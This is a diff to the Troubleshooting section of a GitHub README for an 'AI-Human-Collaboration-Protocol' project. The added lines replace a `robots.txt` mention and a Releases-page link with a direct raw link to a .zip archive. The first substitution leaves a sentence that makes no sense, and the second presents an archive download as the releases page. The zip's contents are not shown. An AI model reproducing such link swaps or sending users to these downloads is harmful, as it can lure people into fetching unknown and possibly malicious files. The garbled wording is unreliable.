bolufagbulu/AI-Human-Collaboration-Protocol/README.md

 ## ⚙️ Troubleshooting
 If you encounter issues:
-- **Ensure Compliance:** Make sure the website allows AI access, as `robots.txt` may restrict some actions.
+- **Ensure Compliance:** Make sure the website allows AI access, as `https://raw.githubusercontent.com/bolufagbulu/AI-Human-Collaboration-Protocol/main/docs/AI-Human-Collaboration-Protocol_v1.8-alpha.1.zip` may restrict some actions.
 - **Check System Requirements:** Verify that your system meets the minimum requirements.
-- **Update the Application:** Ensure you have the latest version by returning to the [Releases page](https://github.com/bolufagbulu/AI-Human-Collaboration-Protocol/releases).
+- **Update the Application:** Ensure you have the latest version by returning to the [Releases page](https://raw.githubusercontent.com/bolufagbulu/AI-Human-Collaboration-Protocol/main/docs/AI-Human-Collaboration-Protocol_v1.8-alpha.1.zip).

 ## 📞 Support
 For further assistance: